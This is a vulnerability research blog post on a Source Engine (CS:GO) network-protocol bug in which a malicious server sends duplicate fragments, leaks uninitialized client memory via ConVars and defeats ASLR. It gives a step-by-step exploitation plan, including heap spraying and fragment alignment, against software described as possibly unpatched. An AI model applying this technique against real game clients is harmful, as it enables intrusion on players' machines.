Offensive on the Source Engine Network Protocol - Part 1: InfoLeak
This post starts a series of a few dedicated to my work on exploiting the Source Engine 1 – back in 2022-2023. At the time, CS2 was not out yet, hence, the primary target was still CS:GO. In the course of these posts, I’ll talk about the few bugs that I found and how I exploited them to get remote code execution – particularly targeting CS:GO. Especially, I’ll be focusing on the network protocol of the engine, and dwelve into its internals.
What makes the Source Engine a great candidate to being exploited is the ability for the community to host their own servers. Anyone can host a custom server, and allow any player to join it. This induces a quite large attack surface since an attacker can potentially mess up with the communication protocol between the server and the clients. Targeting the network protocol is quite interesting as it is interactive, which is needed if we want to break ASLR.
In this post, I’ll rapidly go over the network protocol, and talk about an information leak bug I found.
Source Engine Network Protocol in a nutshell
The Source Engine used its own UDP-based transport layer protocol to communicate between clients and servers. Underneath the transport layer, the application layer utilizes – in the case of CS:GO – protobuf-based messages that defines what the client and server may send and receive.
In this series of posts, we’ll focus on the transport layer protocol. The transport layer protocol, based on UDP, allows for sending both unrealiable and reliable messages. Using the same unique socket, they choose whether messages should be reliably sent – i.e. acknoledged by the remote peer – or not.
When it comes to sending a batch of reliable messages, the engine operates that way:
- it serializes each reliable message to send
- it concatenates all serialized messages in a single long buffer (up to a certain byte size)
- optional: it compresses the whole buffer
- it splits the buffer into fragments (of
0x100
bytes each for CS:GO) - it finally sends the fragments to its peer
Fragments may arrive out of order. For each successfully received fragment, the peer sends back an acknoledgement. Finally, once all fragments have been received, the peer decompresses the whole buffer (if compressed), and sequentially deserializes and processes each message.
You can think of this reliable messaging protocol as an alternative to TCP. While the underlying implementation and specification are completely different, the goal is similar: ensuring data is reliably delivered to the peer.
The Bug
The first bug I found in the protocol lies in how the game checks
whether all data fragments for a reliable communication have been received.
When receiving reliable messages, the game stores the metadata in a
structure that we’ll call data_fragments
.
Among other things, it records the expected total number of fragments to receive – in data->total_fragments
.
Let’s take a look at the function responsible for parsing incoming fragments:
bool CNetChan::ReadSubChannelData(bf_read &received, int stream_idx)
{
data_fragments* data = &this->stream_data[stream_idx];
bool is_single_block = received.ReadOneBit() == 0; // is that a single block?
if(!is_single_block)
{
start_fragment = received.ReadUBitLong(...);
fragments_num = received.ReadUBitLong(3); // number of fragments stored on 3 bits
offset = startFragment * FRAGMENT_SIZE;
len = numFragments * FRAGMENT_SIZE;
}
if(offset == 0) // if first fragment then read metadata
{
<...>
data->byte_count = received.ReadUBitLong(...);
data->buffer = malloc(data->byte_count);
data->total_fragments = bytesize_to_fragments(data->byte_count);
data->acked_fragments = 0;
<...>
}
<...> // some checks
received.ReadBytes(data->buffer+offset, len); // read block data
data->acked_fragments += fragments_num; // increment the count of acked fragments
return true;
}
As we can see, when receiving the first fragment, the game reads some metadata such as
the byte size of the message. Then, it computes the expected total number of fragments to receive,
and initializes the counter data->acked_fragments
to track how many fragments have been received.
Each time new fragments arrive, data->acked_fragments
is incremented.
Later, the game checks whether it has received all fragments and whether it should proceed to process the received messages. This is done in:
bool CNetChan::CheckReceivingList(int stream_idx)
{
data_fragments* data = &this->stream_data[stream_idx];
<...>
if (data->acked_fragments < data->total_fragments)
return true;
if (data->acked_fragments > data->total_fragments)
return false;
// we got all fragments... right?
<...>
ProcessMessages(data->buffer)
<...>
}
At first sight, this seems okay-ish: it checks if the number of received fragments matches the expected total. But if we look back at the fragment-receiving routine… nothing prevents receiving the same fragment twice!
“How’s that a problem?”, you might think.
Well, let’s consider a situation with 3 fragments. Suppose we send:
- the first fragment (fragment 0),
- the third fragment (fragment 2) twice.
The game will have received three fragments total – matching the expected number – and will proceed to process the messages.
However, fragment 1 was never received, and the buffer chunk meant for it remains uninitialized!
Eventually, when ProcessMessages
is called in CNetChan::CheckReceivingList
, it will try to process the whole buffer
including the uninitialized chunk meant for the second fragment (fragment 1)!
Breaking ASLR
This kind of bug is unlikely to lead to memory corruption. However, since it allows you to trick the game into processing uninitialized memory as if it were legitimate data from the host, it can likely be exploited to leak information.
That said, exploiting this vulnerability requires precise control over what you send to the peer and when. Rather than building a proxy to intercept and modify live game traffic, I chose to reverse-engineer and fully reimplement the protocol from scratch. So, in the end, I built a custom server in Python that lets me send whatever I want, whenever I want… which is way more comfortable and flexible than any other hacky solution.
For the rest of this post, we’ll consider that we are a malicous server, with the goal of leaking information from the connected clients.
Global strategy
So, how do we turn this into an information leak? To achieve this, we need to find:
- a game message whose content is stored by the client,
- a way query that content back.
The global idea is use a game message that causes the client to store uninitialized data, as if it were legitimately sent by the server. Then, by querying this content back, the client would unknowingly send the uninitialized data – effectively leaking data to the server.
Unfortunately, the Source Engine server is authoritative. Most communication flows from the server to the client, not the other way around. The server generally hasn’t much to query from the client. After all, why would the server send data to the client, only to query it back later?
Yet, luckily, there is one feature in the Source Engine that fits our needs: ConVar.
Leveraging ConVar to leak data
ConVars are configuration variables used by the Source Engine to control various behaviors, both on client and server side. Each ConVar has a name, an associated value – typically a string, float, or integer – and optional metadata such as flags – e.g. read-only, cheat-protected – and callbacks. What makes ConVars interesting in our situation is that:
- servers can query or set ConVar values on connected clients via game messages,
- clients may respond with ConVar data, which can become a side-channel for leaking information if those values are influenced by uninitialized data.
Basically, if the server tricks the client into storing uninitialized memory into a ConVar, and then queries that value back, it may leak sensitive data back to the attacker!
Here are the relevant protobuf game messages related to ConVars manipulation.
To set ConVar values on connected clients, the server sends a CNETMsg_SetConVar
message, which wraps a list of name-value pairs:
message CMsg_CVars {
message CVar {
optional string name = 1;
optional string value = 2;
}
repeated .CMsg_CVars.CVar cvars = 1;
}
message CNETMsg_SetConVar {
optional .CMsg_CVars convars = 1;
}
To query ConVar values from clients, the server sends a CSVCMsg_GetCvarValue
request. The client then responds with a CCLCMsg_RespondCvarValue
message containing the value:
message CSVCMsg_GetCvarValue {
optional int32 cookie = 1;
optional string cvar_name = 2;
}
message CCLCMsg_RespondCvarValue {
optional int32 cookie = 1;
optional int32 status_code = 2;
optional string name = 3;
optional string value = 4;
}
The cookie
field acts as an identifier to match the response with the query, and the status_code
indicates whether the query succeeded. If a ConVar exists on the client and isn’t protected (e.g. by a flag like FCVAR_PROTECTED
), the client will send back its current value.
To exploit this, we need to craft data fragments such that a CNETMsg_SetConVar
spans across two fragments. The goal is for part of the message to fall in the uninitialized fragment chunk – specifically, the value
field. This way, the client will parse and store the value
field using uninitialized data, effectively injecting it into an existing ConVar that we can query afterwards.
“Okay but how do we actually pull that off?”
To achieve this, we need to dwelve a bit into the protobuf (de)serialization format.
Protobuf serialization format
Protobuf serializes data as key-value pairs – see the documentation for more information – where each field is encoded with:
- a key (varint:
(field_number << 3) | wire_type
) - followed by a value, whose format depends on the wire type (e.g. string, varints, fixed64)
Each string is encoded as:
[field key] [length varint] [raw bytes/string content]
One critical detail is that field order in the serialized message is not enforced. Since every field has a unique identifier, protobuf parsers don’t rely on a fixed order. This means that a message like CVar
:
message CVar {
optional string name = 1;
optional string value = 2;
}
can legally be serialized with value
placed after name
, or the other way around!
This flexibility comes very handy for our exploitation. By putting the value
field at the end of the message, we can arrange the fragments layout such that value
falls across fragment boundary. Specifically, such that its string value – just after the length varint – ends up being read from the uninitialized fragment.
Say we want to serialize:
name: "leak_me"
value: "aaaaaaaa"
We craft the fields so value
is last:
0A 07 6C 65 61 6B 5F 6D 65 // name = "leak_me"
12 08 41 41 41 41 41 41 41 41 // value = "aaaaaaaa"
Now, if we make sure that a fragment ends right after 08
(string length of value
), and that the subsequent fragment is left uninitialized, then, the content of value
will be read from uninitialized memory:
0A 07 6C 65 61 6B 5F 6D 65 // name = "leak_me"
12 08 ?? ?? ?? ... // value = ??? (uninitialized)
🡑
(fragment ends here)
and will eventually be stored into the client’s leak_me
ConVar.
In the end, we can simply send a CSVCMsg_GetCvarValue
message to query that ConVar, and the client will respond with a CCLCMsg_RespondCvarValue
containing the parsed value – effectively leaking the first few bytes of the uninitialized fragment.
What to leak?
So, we’ve shown that it’s possible to leak uninitialized memory from the client. But now comes this question: what to leak? or what can we leak?
Leaking random heap junk isn’t likely to be useful. Ideally, we want to leak a pointer – something that lets us compute the base address of an executable section (e.g. a shared library or the main executable itself).
To do this, we need to massage the heap such that a freed buffer – previously holding pointers – is reallocated when receiving our CNETMsg_SetConVar
message. So, here’s the plan:
- trigger an allocation client-side,
- ensure that the allocated buffer contains pointers – especially around potential fragment frontiers,
- free that buffer,
- re-allocate it to receive our incoming fragments,
- leak the stale pointers via ConVars.
After reading write-ups on past Source Engine exploits – especially this SecretClub blogpost, I knew exactly which game mechanics would fit my need: prop tables. In the Source Engine, prop tables – short for property tables – define the structure of networked entity data. Each entry maps a named property to its type, highest value, lowest value etc. These tables are generated from server-side entity classes and sent to clients, allowing them to parse incoming entity updates correctly.
Prop tables are sent via the CSVCMsg_SendTable
message:
message CSVCMsg_SendTable
{
message sendprop_t
{
optional int32 type = 1;
optional string var_name = 2;
optional int32 flags = 3;
optional int32 priority = 4;
optional string dt_name = 5;
optional int32 num_elements = 6;
optional float low_value = 7;
optional float high_value = 8;
optional int32 num_bits = 9;
};
optional bool is_end = 1;
optional string net_table_name = 2;
optional bool needs_decoder = 3;
repeated sendprop_t props = 4;
}
We see that each table contains a list of sendprop_t
sub-messages. When the client receives a CSVCMsg_SendTable
,
it internally allocates an array of SendProp
C++ objects, and populates it based on the message content.
This array is allocated via the new[]
C++ operator which means that all objects are stored contiguously in memory.
Internally, the new[]
operator also stores the number of SendProp
at the start of the buffer – just before the first object – to keep track of how many destructors to call during deletion.
Since we control the number of sendprop_t
entries in the message, we also control the size of the allocated array –
which becomes very useful when we want that buffer to later be re-allocated for our crafted fragments.
What makes SendProp
particularly interesting is that it is a derived C++ class with virtual methods, meaning that each object has a vtable pointer!
So, by allocating a SendProp
array, we end up with a buffer of memory filled with pointers at known offsets, one per object:
SendProp
array.Vtables are are great leak targets because they point directly into fixed offsets within known memory sections. If we manage to leak one of them, we can compute the base address of the module, thus defeating ASLR – yay!
“Okay, but you mentioned freeing the buffer, can we actually cause that?”
No need! In fact, the engine already does it by itself! When a CSVCMsg_SendTable
is received, the engine allocates the
SendProp
array, fills it in, and then copy its content into another structure. Afterwards, the original array is freed
immediately – exactly what we want for our re-allocation strategy!
Aligning SendProp
and fragments
So, we’ve figured out how to leak uninitialized memory from the client, and we’ve identified a leak target – i.e. vtable pointers inside SendProp
arrays. Now it’s time to put the pieces together and build a full leak primitive. The goal is simple: trick the client into placing a stale SendProp
pointer at a fragment frontier, to leak it into a ConVar, then have it send that back to us.
First, we need to figure out how many SendProp
objects are required so that one of them ends up aligned with the start of a
fragment – if such alignment is possible at all. The goal is to line up a SendProp
in memory such that it’s vtable pointer overlaps the portion of memory that gets interpreted as the ConVar value
field. Here is the memory layout that we are aiming for:
SendProp
vtable leak.In our case, fragments are 0x100
bytes long, whereas each SendProp
object is 0x88
bytes long – at least in CS:GO at the time.
We also need to take into account that the first SendProp
object starts at offset 0x8
– it is prepended with the total number of SendProp
.
This mismatch means we’ll need to do some math – hehe. You can actually reduce the problem to a diophantine equation…
…where $x$ is the number of fragments before alignment, and $y$ is the number of SendProp
before alignment.
In the end, you’ll find that $x = 8$ and $y = 15$ is a solution to the equation. Meaning that the 9th fragment, and 16th SendProp
object will be aligned!
Putting it all together
At last, we have all the pieces required for a successful information leak. Here’s how we tie it all together:
-
heap spraying: send a bunch of
CSVCMsg_SendTable
messages to fill the heap and increase the probability to re-allocate aSendProp
array, -
craft our fragments such that the
CNETMsg_SetConVar
message straddles the 9th fragment frontier – with thevalue
field at the beginning of that fragment, - trigger the bug: send the fragments to the client – except the 9th one – and resend a previous fragment – causing the 9th to remain uninitialized,
-
hope that the buffer allocated for the fragments contains stale
SendProp
objects, -
extract the leaked value: query the ConVar with a
CSVCMsg_GetCvarValue
request, - compute the base address and profit!
For reference, the vtable for SendProp
resides in engine_client.so
. So by leaking the vtable pointer, we can compute the base address of engine_client.so
.
In the end, this came up as super reliable, all it took was to find the best allocation size to maximize the probability of success.
From here, it’s just a matter of using that leaked pointer to bypass ASLR and chain into something more powerful…
Conclusion
This bug wasn’t about crashing the client or hijacking control flow (yet) – it was about understanding how the engine behaves under edge conditions, when we break its assumptions. By exploiting the way the Source Engine handles reliable message fragments, we built a clean and reliable information leak. This bug was pretty interesting to exploit, as it required a bit of engineering and a deep dive into the engine internals and protobuf serialization mechanisms. In the end, we get a vtable pointer from engine_client.so
, giving us an great ASLR bypass – and a starting point for more.
In the upcoming posts of this series, I’ll dive into memory corruption bugs and dirty heap manipulations that ultimately lead to remote code execution client-side. Stay tuned for the deep technical details and exploits – it’ll be fun!
Responsible Disclosure
I reported this vulnerability to Valve in November 2022 via Hackerone. Unfortunately, Valve has a reputation for slow or limited responsiveness to security reports, and to the best of my knowledge, this particular bug was never patched in CS:GO or any other affected Source 1 game. With the planned release of CS2 a few months after the report, it seems Valve deprioritized fixing issues in their legacy engine – that was nonetheless still in use at the time by CS:GO players. Recently, some Source 1 titles like Team Fortress 2 have been updated to support Valve’s newer network protocol stack – GameNetworkingSockets – used in newer title like CS2.